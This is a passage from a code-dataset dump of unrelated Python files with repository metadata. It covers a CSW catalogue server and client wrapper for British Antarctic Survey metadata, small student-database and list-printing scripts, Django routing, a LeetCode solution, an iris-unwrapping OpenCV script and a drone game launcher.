import HTTPError\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import ProgrammingError\nfrom flask_azure_oauth import AzureToken\n\nfrom scar_add_metadata_toolbox.hazmat.csw import (\n CSWClient as _CSWClient,\n CSWServer as _CSWServer,\n convert_csw_brief_gmd_to_gmi_xml,\n CSWAuth,\n)\n\n\nclass CSWGetRecordMode(Enum):\n \"\"\"\n Represents the element set names used in the CSW specification\n \"\"\"\n\n FULL = \"full\"\n SUMMARY = \"summary\"\n BRIEF = \"brief\"\n\n\nclass CSWTransactionType(Enum):\n \"\"\"\n Represents the transaction types used in the CSW specification\n \"\"\"\n\n INSERT = \"insert\"\n UPDATE = \"update\"\n DELETE = \"delete\"\n\n\nclass CSWDatabaseAlreadyInitialisedException(Exception):\n \"\"\"\n Represents a situation whereby a CSW Server's backing database has already been initialised\n\n Backing databases must only be initialised once to avoid errors creating duplicate structures or unwanted side\n effects such as table truncation. If a database is initialised multiple times this role would be violated.\n \"\"\"\n\n pass\n\n\nclass CSWDatabaseNotInitialisedException(Exception):\n \"\"\"\n Represents a situation where the backing database for a CSW Server has not yet been initialised\n\n Backing databases must be initialised to ensure relevant database structures, indexes and triggers exist and are\n configured before records are written or read from a catalogue. If requests are made to a CSW server before has\n happened this rule would be violated. The relevant initialisation method can be ran to resolve this.\n \"\"\"\n\n pass\n\n\nclass CSWMethodNotSupportedException(Exception):\n \"\"\"\n Represents a situation where an unsupported HTTP method is used in a request to a CSW Server\n\n CSW requests must use the HEAD, GET or POST HTTP method. If another method is used this rule would be violated.\n \"\"\"\n\n pass\n\n\nclass CSWAuthException(Exception):\n \"\"\"\n Represents a situation where there the authentication information included in a CSW request causes an error\n\n This is a non-specific error and could indicate a range of situations, such as a token having expired or being\n malformed.\n \"\"\"\n\n pass\n\n\nclass CSWAuthMissingException(Exception):\n \"\"\"\n Represents a situation where authentication information is required for a CSW request but was not included\n\n Requests to authenticated CSW requests must include authentication information. If this is missing this rule would\n be violated.\n \"\"\"\n\n pass\n\n\nclass CSWAuthInsufficientException(Exception):\n \"\"\"\n Indicates a situation where the authorisation requirements for a CSW request are not satisfied by the information\n included in the request\n\n Requests to authorised CSW requests must include authorisation information that satisfies all the requirements of\n the resource or action being requested. If any of these requirements are not met this rule would be violated.\n\n Typically this error relates to missing scopes/roles that are required by the resource or action being requested.\n E.g. to publish a record the Publish scope/role is required.\n \"\"\"\n\n pass\n\n\nclass RecordServerException(Exception):\n \"\"\"\n Represents a situation where a record server encounters an error processing a request\n\n This is a non-specific error and could indicate a range of situations, such as a record being malformed or an\n internal error within record server.\n \"\"\"\n\n pass\n\n\nclass RecordNotFoundException(Exception):\n \"\"\"\n Represents a situation where a given record does not exist\n \"\"\"\n\n pass\n\n\nclass RecordInsertConflictException(Exception):\n \"\"\"\n Represents a situation where a record to be inserted already exists in a repository\n\n Records in repositories must be unique. If a record is inserted with the same identifier as an existing record,\n neither record not be unique and this rule would be violated. Records may be updated instead.\n \"\"\"\n\n pass\n\n\nclass CSWServer: # pragma: no cover (until #59 is resolved)\n \"\"\"\n Represents a CSW Server backed by PyCSW\n\n This class is largely a wrapper around the PyCSW class in order to improve integrating CSW functionality within\n a larger application, and to add additional functionality including:\n\n * raising exceptions for errors\n * support for token based authentication\n * support for performing/reporting backing database initialisation\n * simplifying PyCSW configuration options using a base configuration\n\n Note: This class uses classes from the Hazardous Materials module. This is to work around limitations in the PyCSW\n package. This will be addressed by upstreaming missing functionality or creating a derivative package.\n \"\"\"\n\n base_configuration = {\n \"server\": {\n \"url\": None,\n \"mimetype\": \"application/xml; charset=UTF-8\",\n \"encoding\": \"UTF-8\",\n \"language\": \"en-GB\",\n \"maxrecords\": \"100\",\n \"loglevel\": \"DEBUG\",\n \"logfile\": \"/dev/null\",\n \"pretty_print\": \"true\",\n \"gzip_compresslevel\": \"8\",\n \"domainquerytype\": \"list\",\n \"domaincounts\": \"false\",\n \"profiles\": \"apiso\",\n },\n \"manager\": {\n \"transactions\": \"true\",\n \"allowed_ips\": \"*.*.*.*\",\n },\n \"metadata:main\": {\n \"identification_title\": \"Internal CSW (Published)\",\n \"identification_abstract\": \"Internal PyCSW OGC CSW server for published records\",\n \"identification_keywords\": \"catalogue, discovery, metadata\",\n \"identification_keywords_type\": \"theme\",\n \"identification_fees\": \"None\",\n \"identification_accessconstraints\": \"None\",\n \"provider_name\": \"British Antarctic Survey\",\n \"provider_url\": \"https://www.bas.ac.uk/\",\n \"contact_name\": \"Mapping and Geographic Information Centre, British Antarctic Survey\",\n \"contact_position\": \"Technical Contact\",\n \"contact_address\": \"British Antarctic Survey, Madingley Road, High Cross\",\n \"contact_city\": \"Cambridge\",\n \"contact_stateorprovince\": \"Cambridgeshire\",\n \"contact_postalcode\": \"CB30ET\",\n \"contact_country\": \"United Kingdom\",\n \"contact_phone\": \"+44(0) 1223 221400\",\n \"contact_email\": \"magic@bas.ac.uk\",\n \"contact_url\": \"https://www.bas.ac.uk/team/magic\",\n \"contact_hours\": \"09:00 - 17:00\",\n \"contact_instructions\": \"During hours of service on weekdays. Best efforts support only.\",\n \"contact_role\": \"pointOfContact\",\n },\n \"repository\": {\"database\": None, \"table\": None},\n \"metadata:inspire\": {\n \"enabled\": \"true\",\n \"languages_supported\": \"eng\",\n \"default_language\": \"eng\",\n \"date\": \"YYYY-MM-DD\",\n \"gemet_keywords\": \"Utility and governmental services\",\n \"conformity_service\": \"notEvaluated\",\n \"contact_name\": \"Mapping and Geographic Information Centre, British Antarctic Survey\",\n \"contact_email\": \"magic@bas.ac.uk\",\n \"temp_extent\": \"YYYY-MM-DD/YYYY-MM-DD\",\n },\n }\n\n def __init__(self, config: dict):\n \"\"\"\n Configuration dict must include:\n\n * endpoint: URL clients will use for access (str)\n * title: catalogue title (str)\n * abstract: catalogue description (str)\n * database_connection_string: PyCSW (SQL Alchemy) connection string (must use PostgreSQL)\n * database_table_table: name of table for storing records (str)\n * auth_required_scopes_read: OAuth scopes required to make record(s) requests (may be empty list)\n * auth_required_scopes_write: OAuth scopes required to make transactional requests (may be empty list)\n\n Other PyCSW configuration options may not be changed.\n\n :type config dict\n :param config: PyCSW config subset\n \"\"\"\n _csw_options = deepcopy(self.base_configuration)\n if \"endpoint\" in config.keys():\n _csw_options[\"server\"][\"url\"] = config[\"endpoint\"]\n if \"title\" in config.keys():\n _csw_options[\"metadata:main\"][\"identification_title\"] = config[\"title\"]\n if \"abstract\" in config.keys():\n _csw_options[\"metadata:main\"][\"identification_abstract\"] = config[\"abstract\"]\n if \"database_connection_string\" in config.keys():\n _csw_options[\"repository\"][\"database\"] = config[\"database_connection_string\"]\n if \"database_table\" in config.keys():\n _csw_options[\"repository\"][\"table\"] = config[\"database_table\"]\n\n self._csw_config = _csw_options\n self._csw_auth = {\"read\": config[\"auth_required_scopes_read\"], \"write\": config[\"auth_required_scopes_write\"]}\n\n @property\n def _is_initialised(self) -> bool:\n \"\"\"\n Tests whether the backing database has been initialised for catalogue\n\n Checks whether records table used for the catalogue exists, if yes it is assumed to have been initialised.\n\n :rtype bool\n :return: whether the backing database has been initialised\n \"\"\"\n csw_database = create_engine(self._csw_config[\"repository\"][\"database\"])\n return csw_database.dialect.has_table(csw_database, self._csw_config[\"repository\"][\"table\"])\n\n def _check_auth(self, method: str, token: Optional[AzureToken]) -> None:\n \"\"\"\n Checks whether an authorisation token contains all of a required set of scopes\n\n I.e. is the client allowed to perform the action they're trying to do.\n\n Currently actions are simplified to 'read' or 'write' and the required set of scopes is specified by the\n 'auth_required_scopes_read' or 'auth_required_scopes_write' class config options.\n\n If the token does not include the required scopes an exception is raised, otherwise nothing is returned.\n\n :type method str\n :param method: either 'read' or 'write'\n :type token AzureToken\n :param token: request authorisation token\n \"\"\"\n try:\n if len(self._csw_auth[method]) > 0 and not token.scopes.issuperset(set(self._csw_auth[method])):\n raise CSWAuthInsufficientException()\n except AttributeError:\n # noinspection PyComparisonWithNone\n if token == None:\n raise CSWAuthMissingException()\n\n def setup(self) -> None:\n \"\"\"\n Initialises the backing database for the catalogue\n\n Convenience method to call the PyCSW admin task for setting up the required database components (tables,\n indexes, triggers, etc.)\n\n Note: There are currently limitations with using multiple catalogues within one schema. The specific errors\n this causes (which are not fatal) are detected by this method and treated as a false positive. See the project\n README for more information.\n \"\"\"\n if self._is_initialised:\n raise CSWDatabaseAlreadyInitialisedException()\n\n csw_database = create_engine(self._csw_config[\"repository\"][\"database\"])\n csw_database.execute(\"SELECT version();\")\n\n try:\n admin.setup_db(\n database=self._csw_config[\"repository\"][\"database\"],\n table=self._csw_config[\"repository\"][\"table\"],\n home=None,\n )\n except ProgrammingError as e:\n # Ignore errors related to PyCSW's limitations with non-namespaced indexes\n if 'ERROR: relation \"fts_gin_idx\" already exists' not in e.orig.pgerror:\n raise CSWDatabaseAlreadyInitialisedException()\n pass\n\n def process_request(self, request: Request, token: Optional[AzureToken] = None) -> Response:\n \"\"\"\n Process a CSW request and return a suitable response\n\n Represents embedding CSW by processing an incoming Flask/HTTP request into a CSW request and returning the CSW\n response as a Flask/HTTP response.\n\n In addition this method:\n\n * implements authorisation checks for reading records and using the transactional profile\n * supports HEAD requests by treating them as GET requests and discarding the response body\n\n :type request Request\n :param request: Flask HTTP request\n :type token AzureToken\n :param token: request authorisation token\n :rtype Response\n :return: Flask HTTP response\n \"\"\"\n if not self._is_initialised:\n raise CSWDatabaseNotInitialisedException()\n\n if request.method != \"HEAD\" and request.method != \"GET\" and request.method != \"POST\":\n raise CSWMethodNotSupportedException()\n\n _csw = _CSWServer(rtconfig=self._csw_config, env=request.environ, version=\"2.0.2\")\n _csw.requesttype = \"GET\"\n _csw.kvp = request.args.to_dict()\n _request_type = \"inspect\"\n\n if request.method == \"POST\":\n _request_type = \"read\"\n _csw.requesttype = \"POST\"\n _csw.request = request.data\n\n request_xml = ElementTree(fromstring(_csw.request))\n if len(request_xml.xpath(\"/csw:Transaction/csw:Insert\", namespaces=csw_namespaces)) > 0:\n _request_type = \"create\"\n elif len(request_xml.xpath(\"/csw:Transaction/csw:Update\", namespaces=csw_namespaces)) > 0:\n _request_type = \"update\"\n elif len(request_xml.xpath(\"/csw:Transaction/csw:Delete\", namespaces=csw_namespaces)) > 0:\n _request_type = \"delete\"\n\n if _request_type == \"read\":\n self._check_auth(method=\"read\", token=token)\n elif _request_type == \"create\" or _request_type == \"update\" or _request_type == \"delete\":\n self._check_auth(method=\"write\", token=token)\n\n status_code, response = _csw.dispatch()\n\n if request.method == \"HEAD\":\n return Response(status=status_code)\n\n return Response(response=response, status=status_code, content_type=_csw.contenttype)\n\n\nclass CSWClient: # pragma: no cover (until #59 is resolved)\n \"\"\"\n Represents a CSW Client backed by OWSLib\n\n This class is largely a wrapper around the OWSLib CSW class in order to abstract away CSW or OWSLib specific\n details (such as needing to known to use the `getRecords2` method for example).\n\n Other features include:\n * raising exceptions for errors\n * support for token based authentication\n * workaround to fix transactional update results count error\n * compatibility with this applications CSWServer class for error handling\n * compatibility with this applications Repository class for setting CSW configuration options\n\n Note: This class uses classes from the Hazardous Materials module. This is to work around limitations in the OWSLib\n package. This will be addressed by upstreaming missing functionality or creating a derivative package.\n \"\"\"\n\n def __init__(self, config: dict):\n \"\"\"\n Configuration dict must include:\n\n * endpoint: URL to CSW service (str)\n * auth: parameters for CSW authentication object (may be empty dict)\n\n Other OWSLib configuration options may also be included.\n\n :type config: dict\n :param config: CSW (OWSLib) configuration options\n \"\"\"\n self._csw_config = config\n self._csw_endpoint = config[\"endpoint\"]\n self._csw_auth = CSWAuth(**config[\"auth\"])\n del self._csw_config[\"endpoint\"]\n del self._csw_config[\"auth\"]\n\n def __repr__(self):\n return f\"\"\n\n def _get_client(self) -> _CSWClient:\n \"\"\"\n Creates a OWSLib CSW client instance\n\n A separate CSW instance is used for each action (read/transaction), rather using a class instance singleton, as\n OWSLib will attempt to retrieve the CSW GetCapabilities response on instantiation. This behaviour can result in\n errors where CSW endpoints may not yet exist for example.\n\n Due to the behaviour of OWSLib, auth errors emanating from the Flask Azure OAuth provider (used to secure CSW\n server instances) trigger a ServiceException before the relevant action is taken, and so must be caught here.\n\n Note: This method currently uses a modified class from the hazardous materials classes.\n\n :rtype CatalogueServiceWeb\n :return: OWSLib CSW client (modified)\n \"\"\"\n try:\n return _CSWClient(self._csw_endpoint, auth=self._csw_auth, **self._csw_config)\n except ServiceException:\n raise CSWAuthException()\n\n def get_record(self, identifier: str, mode: CSWGetRecordMode = CSWGetRecordMode.FULL) -> str:\n \"\"\"\n Return a single record\n\n CSW supports returning full/complete records or summary versions with more specific elements. Formally CSW\n refers to these as Element Set Names, this method refers to this as the (record) mode. Options are described by\n the CSWGetRecordMode enumeration.\n\n Note: If 'brief' records are requested, a fixer method from the hazardous materials classes is used.\n\n :type identifier str\n :param identifier: ISO 19115 file identifier\n :type mode CSWGetRecordMode\n :param mode: CSW record mode (element set name)\n :rtype str\n :return: ISO 19115-2 record encoded as an XML string\n \"\"\"\n _csw = self._get_client()\n try:\n _csw.getrecordbyid(id=[identifier], esn=mode.value, outputschema=\"http://www.isotc211.org/2005/gmd\")\n if len(_csw.records) != 1:\n raise RecordNotFoundException()\n return _csw.records[identifier].xml.decode()\n except HTTPError as e:\n if e.response.content.decode() == \"Catalogue not yet available.\":\n raise CSWDatabaseNotInitialisedException()\n raise HTTPError(e)\n except XMLSyntaxError:\n if _csw.response.decode() == \"Missing authorisation token.\":\n raise CSWAuthMissingException()\n elif _csw.response.decode() == \"Insufficient authorisation token.\":\n raise CSWAuthInsufficientException()\n\n def get_records(self, mode: CSWGetRecordMode = CSWGetRecordMode.FULL) -> List[str]:\n \"\"\"\n Return all records\n\n Currently returns all records in a CSW catalogue, i.e. search/filtering options are not yet supported.\n\n CSW supports returning full/complete records or summary versions with more specific elements. Formally CSW\n refers to these as Element Set Names, this method refers to this as the (record) mode. Options are described by\n the CSWGetRecordMode enumeration.\n\n Note: If 'brief' records are requested, a fixer method from the hazardous materials classes is used.\n\n :type mode CSWGetRecordMode\n :param mode: CSW record mode (element set name)\n :rtype list\n :return: list of ISO 19115-2 records encoded as XML strings\n \"\"\"\n _csw = self._get_client()\n try:\n _csw.getrecords2(\n typenames=\"gmd:MD_Metadata\",\n esn=mode.value,\n resulttype=\"results\",\n outputschema=\"http://www.isotc211.org/2005/gmd\",\n maxrecords=100,\n )\n for raw_record in _csw.records.values():\n if isinstance(raw_record.xml, bytes):\n raw_record.xml = raw_record.xml.decode()\n if mode == CSWGetRecordMode.BRIEF:\n raw_record.xml = convert_csw_brief_gmd_to_gmi_xml(record_xml=raw_record.xml)\n yield raw_record.xml\n except HTTPError as e:\n if e.response.content.decode() == \"Catalogue not yet available.\":\n raise CSWDatabaseNotInitialisedException()\n except XMLSyntaxError:\n if _csw.response.decode() == \"Missing authorisation token.\":\n raise CSWAuthMissingException()\n elif _csw.response.decode() == \"Insufficient authorisation token.\":\n raise CSWAuthInsufficientException()\n\n def insert_record(self, record: str) -> None:\n \"\"\"\n Inserts a new record\n\n Uses the CSW transactional profile to insert a new record into a CSW catalogue.\n\n Note: If a record with the same IS0 19115 file identifier exists it will be considered a duplicate of an\n existing record and result in a conflict error. To update an existing record, including changing it's file\n identifier, use the `update_record()` method.\n\n :type record str\n :param record: ISO 19115-2 record encoded as an XML string\n \"\"\"\n _csw = self._get_client()\n try:\n _csw.transaction(ttype=CSWTransactionType.INSERT.value, typename=\"gmd:MD_Metadata\", record=record)\n if len(_csw.results[\"insertresults\"]) != 1:\n raise RecordServerException()\n except ExceptionReport:\n raise RecordInsertConflictException()\n except HTTPError as e:\n if e.response.content.decode() == \"Catalogue not yet available.\":\n raise CSWDatabaseNotInitialisedException()\n except XMLSyntaxError:\n if _csw.response.decode() == \"Missing authorisation token.\":\n raise CSWAuthMissingException()\n elif _csw.response.decode() == \"Insufficient authorisation token.\":\n raise CSWAuthInsufficientException()\n\n def update_record(self, record: str) -> None:\n \"\"\"\n Updates an existing record\n\n Uses the CSW transactional profile to update an existing record in a CSW catalogue.\n\n This method requires complete/replacement records, partial record updates are not supported.\n\n :type record str\n :param record: ISO 19115-2 record encoded as an XML string\n \"\"\"\n _csw = self._get_client()\n try:\n _csw.transaction(ttype=CSWTransactionType.UPDATE.value, typename=\"gmd:MD_Metadata\", record=record)\n # Workaround for https://github.com/geopython/OWSLib/issues/678\n _csw.results[\"updated\"] = int(\n ElementTree(fromstring(_csw.response)).xpath(\n \"/csw:TransactionResponse/csw:TransactionSummary/csw:totalUpdated/text()\",\n namespaces=csw_namespaces,\n )[0]\n )\n if _csw.results[\"updated\"] != 1:\n raise RecordServerException()\n except HTTPError as e:\n if e.response.content.decode() == \"Catalogue not yet available.\":\n raise CSWDatabaseNotInitialisedException()\n except XMLSyntaxError:\n if _csw.response.decode() == \"Missing authorisation token.\":\n raise CSWAuthMissingException()\n elif _csw.response.decode() == \"Insufficient authorisation token.\":\n raise CSWAuthInsufficientException()\n\n def delete_record(self, identifier: str) -> None:\n \"\"\"\n Deletes an existing record\n\n Uses the CSW transactional profile to delete an existing record from a CSW catalogue.\n\n :type identifier str\n :param identifier: ISO 19115 file identifier\n \"\"\"\n _csw = self._get_client()\n try:\n _csw.transaction(ttype=CSWTransactionType.DELETE.value, identifier=identifier)\n _csw.results[\"deleted\"] = int(\n ElementTree(fromstring(_csw.response)).xpath(\n \"/csw:TransactionResponse/csw:TransactionSummary/csw:totalDeleted/text()\",\n namespaces=csw_namespaces,\n )[0]\n )\n # noinspection PyTypeChecker\n if _csw.results[\"deleted\"] != 1:\n raise RecordServerException()\n except HTTPError as e:\n if e.response.content.decode() == \"Catalogue not yet available.\":\n raise CSWDatabaseNotInitialisedException()\n except XMLSyntaxError:\n if _csw.response.decode() == \"Missing authorisation token.\":\n raise CSWAuthMissingException()\n elif _csw.response.decode() == \"Insufficient authorisation token.\":\n raise CSWAuthInsufficientException()\n","repo_name":"antarctica/scar-add-metadata-toolbox","sub_path":"scar_add_metadata_toolbox/csw.py","file_name":"csw.py","file_ext":"py","file_size_in_byte":24891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70766158618","text":"import random\n\nf_out = open('out.txt', 'w')\n\nf_out.write(\"\"\"CONNECT '.../students.fdb'\n\nCREATE TABLE marks(\n id INTEGER,\n student_id INTEGER,\n subject_id INTEGER,\n mark INTEGER\n);\n\n\"\"\")\n\nsubject_id = 1\nid = 1\nfor student_id in range(1, 101):\n for c in range(0, 30, 5):\n f_out.write(\"INSERT INTO marks VALUES(%d, %d, %d, %d);\\n\" % (id, student_id, subject_id + c, random.randint(1, 10)))\n id += 1\n subject_id = subject_id + 1 if subject_id < 5 else 1\n","repo_name":"LuckThemAll/DB","sub_path":"StudentsDB/generators/marks generator.py","file_name":"marks generator.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37032946698","text":"from typing import Optional\n\n\nclass AnilistComicInfo:\n def __init__(\n self,\n tracker_id: int,\n title: str, # userPreferred\n manga_format: str, # format\n status: str,\n description: str,\n country_of_origin: str,\n original_source: str,\n genres: [str],\n writer: Optional[str],\n penciller: Optional[str],\n inker: Optional[str],\n synonyms: [str],\n is_adult: bool,\n site_url: str,\n chapters: Optional[int], # Chapters is null if an ongoing series\n volumes: Optional[int], # Volumes is null if ongoing\n tags: [str]\n ):\n self.tracker_id = tracker_id\n\n self.title = title\n self.altTitles = synonyms\n self.summary = description\n self.genres = \", \".join(genres+tags)\n\n self.status = status.lower()\n self.format = manga_format.lower().replace(\"_\", \" \")\n self.country_of_origin = country_of_origin\n self.original_source = original_source.lower()\n\n if is_adult:\n self.age_rating = \"Adults Only 18+\"\n else:\n self.age_rating = \"G\"\n\n if writer == \"\":\n self.writer = None\n else:\n self.writer = writer\n\n if penciller == \"\":\n self.penciller = None\n else:\n self.penciller = penciller\n\n if inker == \"\":\n self.inker = None\n else:\n self.inker = inker\n\n self.chapters = chapters\n self.volumes = volumes\n\n self.site_url = site_url\n self.scan_information = \"\"\n","repo_name":"curche/MangaManage","sub_path":"models/anilistToComicInfo.py","file_name":"anilistToComicInfo.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"68"} +{"seq_id":"12338162964","text":"# Welcome to my list project\r\n # لیست اول: نام‌های پسر\r\nboys_name_list = [\"Mani\", \"Mohammad\", \"Ali\", \"Amir Hossein\", \"Hossein\", \"Abolfazl\", \"Amir Abbas\", \"Samiyar\", \"Mohammad Taha\", \"Mohammad Reza\"]\r\nfor boys_name in boys_name_list :\r\n print ( boys_name )\r\n\r\n\r\n# لیست دوم: نام‌های حیوانات\r\nanimals_list = [\"Lion\", \"Tiger\", \"Elephant\", \"Giraffe\", \"Dolphin\", \"Panda\", \"Kangaroo\", \"Zebra\", \"Cheetah\", \"Penguin\"]\r\nfor animals in animals_list :\r\n print ( animals )\r\n\r\n\r\n# لیست سوم: نام‌های شهرها\r\ncities_list = [\"New York\", \"Los Angeles\", \"Paris\", \"Tokyo\", \"London\", \"Sydney\", \"Dubai\", \"Rome\", \"Berlin\", \"Moscow\"]\r\nfor cities in cities_list :\r\n print ( cities )\r\n\r\n\r\n# لیست چهارم: نام‌های میوه‌ها\r\nfruits_list = [\"Apple\", \"Banana\", \"Orange\", \"Grapes\", \"Strawberry\", \"Watermelon\", \"Mango\", \"Pineapple\", \"Cherry\", \"Kiwi\"]\r\nfor fruits in fruits_list :\r\n print ( fruits )\r\n\r\n\r\n# لیست پنجم: نام‌های رنگ‌ها\r\ncolors_list = [\"Red\", \"Blue\", \"Green\", \"Yellow\", \"Purple\", \"Orange\", \"Pink\", \"Brown\", \"Black\", \"White\"]\r\nfor colors in colors_list :\r\n print ( colors )\r\n\r\n\r\n# لیست ششم: نام‌های ورزش‌ها\r\nsports_list = [\"Football\", \"Basketball\", \"Tennis\", \"Soccer\", \"Golf\", \"Swimming\", \"Cricket\", \"Baseball\", \"Volleyball\", \"Hockey\"]\r\nfor sports in sports_list :\r\n print ( sports )\r\n\r\n\r\n# لیست هفتم: نام‌های میهن‌ها\r\ncountries_list = [\"Iran\", \"USA\", \"France\", \"Japan\", \"UK\", \"Australia\", \"UAE\", \"Italy\", \"Germany\", \"Russia\"]\r\nfor countries in countries_list :\r\n print ( countries )\r\n\r\n\r\n# لیست هشتم: نام‌های اساتید\r\nteachers_list = [\"Professor Smith\", \"Dr. Johnson\", \"Professor Lee\", \"Dr. Clark\", \"Professor Brown\", \"Dr. Wilson\", \"Professor Taylor\", \"Dr. Anderson\", \"Professor Harris\", \"Dr. Martin\"]\r\nfor teachers in teachers_list :\r\n print ( teachers )\r\n\r\n\r\n\r\n\r\n# لیست نهم: نام‌های ماه‌های سال\r\nmonths_list = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\"]\r\nfor months in months_list :\r\n print ( months )\r\n\r\n\r\n\r\n# لیست دهم: نام‌های ماشین‌ها\r\ncars_list = [\"Toyota\", \"Honda\", \"Ford\", \"Chevrolet\", \"Nissan\", \"BMW\", \"Mercedes-Benz\", \"Audi\", \"Lexus\", \"Tesla\"]\r\nfor cars in cars_list:\r\n print ( cars ) \r\n\r\n\r\n","repo_name":"salehmorovat/my-list","sub_path":"my_list.py","file_name":"my_list.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42279998821","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom monitoring.views import HumiditySampleViewSet, PlantViewSet, get_humidity\n\n\nrouter = DefaultRouter()\nrouter.register('humidity', HumiditySampleViewSet)\nrouter.register('plant', PlantViewSet)\n\nurlpatterns = [\n path('', include(router.urls)),\n path('humiditySamples/', get_humidity),\n]\n","repo_name":"matfij/watering-system-api","sub_path":"api/monitoring/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"86400860256","text":"import numpy as np\nfrom risk.dice import roll_dice\n\n\ndef test_roll_dice():\n for i in range(10):\n results = roll_dice(i)\n assert len(results) == i\n assert all([r > 0 and r < 7 for r in results])\n\n\ndef test_seed():\n np.random.seed(0)\n assert list(roll_dice(3)) == [5, 6, 1]\n","repo_name":"alexdawn/risk","sub_path":"tests/test_dice.py","file_name":"test_dice.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74228476697","text":"\"\"\"\nYou are given a two-dimensional integer matrix of 1s and 0s. A 1 represents land and 0 represents water, so an island is a group of 1s that are neighboring whose perimeter is surrounded by water. You can assume that the edges of the matrix are surrounded by water.\n\nReturn the area of the largest island in matrix.\nLeetcode: https://leetcode.com/problems/max-area-of-island/\n\"\"\"\nclass Solution:\n \n def dfs(self, grid, r, c):\n grid[r][c] = 0\n num = 1\n lst = [(r-1, c), (r+1, c), (r, c-1), (r, c+1)]\n for row, col in lst:\n if row >= 0 and col >= 0 and row < len(grid) and col < len(grid[0]) and grid[row][col] == 1:\n num += self.dfs(grid, row, col)\n return num\n \n \n def maxAreaOfIsland(self, grid):\n area_islands = 0\n for r in range(len(grid)):\n for c in range(len(grid[0])):\n if grid[r][c] == 1:\n area_islands = max(area_islands, self.dfs(grid, r, c))\n return area_islands","repo_name":"d-jeph/CodeChallenges","sub_path":"maxAreaIsland.py","file_name":"maxAreaIsland.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"15349104050","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy import signal as sg\n\nimg = cv2.imread('oko01.png', 0)\n\n\ndef filtration(img, matrix):\n if img.ndim == 2:\n return sg.convolve2d(img, matrix[:, ::-1], \"valid\").astype(\"uint8\")\n if img.ndim == 3:\n res_lst = [sg.convolve2d(img[:, :, x], matrix[:, ::-1], \"valid\") for x in range(img.shape[2])]\n return np.rollaxis(np.array(res_lst), 0, 3).astype(\"uint8\")\n\n\ngauss_matrix = np.array([[0.037, 0.039, 0.04, 0.039, 0.037],\n [0.039, 0.042, 0.042, 0.042, 0.039],\n [0.04, 0.042, 0.043, 0.042, 0.04],\n [0.039, 0.042, 0.042, 0.042, 0.039],\n [0.037, 0.039, 0.04, 0.039, 0.037]])\n\n# img = filtration(img, gauss_matrix)\n\nkernel = np.ones((3, 3), np.uint8)\n_, bin_img_teczowka = cv2.threshold(img, img.mean() / 1.5, 255, cv2.THRESH_BINARY)\n_, bin_img_zrenica = cv2.threshold(img, img.mean() / 4.5, 255, cv2.THRESH_BINARY)\n\nbin_img_teczowka = cv2.morphologyEx(bin_img_teczowka, cv2.MORPH_CLOSE, kernel, iterations=8)\nbin_img_zrenica = cv2.morphologyEx(bin_img_zrenica, cv2.MORPH_CLOSE, kernel, iterations=2)\n\nM = cv2.moments(255 - bin_img_zrenica)\ncX = int(M[\"m10\"] / M[\"m00\"])\ncY = int(M[\"m01\"] / M[\"m00\"])\ncontours, hierarchy = cv2.findContours(bin_img_zrenica, 1, 2)\ncnt = contours[2]\n# cnt = contours[1]\n(x, y), radius = cv2.minEnclosingCircle(cnt)\ncenter = (int(x), int(y))\nradius = int(radius)\nimg = cv2.imread('oko01.png')\nimg = cv2.circle(img, center, radius, (0, 255, 0), 2)\nprint(radius)\ncontours, _ = cv2.findContours(bin_img_teczowka, 1, 2)\ncnt = contours[1]\n(x, y), radius = cv2.minEnclosingCircle(cnt)\ncenter = (int(x), int(y))\nradius = int(radius)\nprint(radius)\n\nimg = cv2.circle(img, center, radius, (0, 0, 255), 2)\n#first option\nimg2 = cv2.linearPolar(img, center=(x, y), maxRadius=52, flags=cv2.WARP_FILL_OUTLIERS)\n#second option\nimg3 = cv2.logPolar(img, center=(x, y), M=52, flags=cv2.WARP_FILL_OUTLIERS)\n\nplt.imshow(img)\nplt.show()\n\nplt.imshow(img2)\nplt.show()\n\nplt.imshow(img3)\nplt.show()\n","repo_name":"Lyudmyla25/Biometria","sub_path":"Lab6/Zad1.py","file_name":"Zad1.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6498579156","text":"N, K = map(int, input().split())\nN2, K2 = N, K\ncount = 0\n\nwhile N != 1:\n count += 1\n if N % K == 0:\n N /= K \n else:\n N -= 1\n\nprint(count)\n\ncount2 = 0\n#N이 K의 배수가 되도록 한번에 빼기\nwhile True:\n # (N == K로 나누어 떨어지는 수)가 될 때까지 1씩 빼기\n target = (N2 // K2) * K2\n count2 += (N2 - target)\n N2 = target \n # N이 K보다 작을 때 반복문 탈출\n if N2 < K2:\n break\n # N을 K로 나누기\n count2 += 1\n N2 //= K2\n\n# 마지막으로 남은 수에 대하여 1씩 빼기\ncount2 += (N2 - 1)\nprint(count2)","repo_name":"zizudana/python-for-coding-test","sub_path":"이코테예제/3-4.py","file_name":"3-4.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33261289504","text":"# -*- coding: utf-8 -*-\n\n# pip install -r requirements.txt\n\nfrom astrobox.space_field import SpaceField\nfrom kochetov import KochetovDrone\n# from vader import VaderDrone\n\nif __name__ == '__main__':\n scene = SpaceField(\n speed=3,\n asteroids_count=15,\n )\n\n k = [KochetovDrone() for _ in range(5)]\n scene.go()\n\n\n# Первый этап: 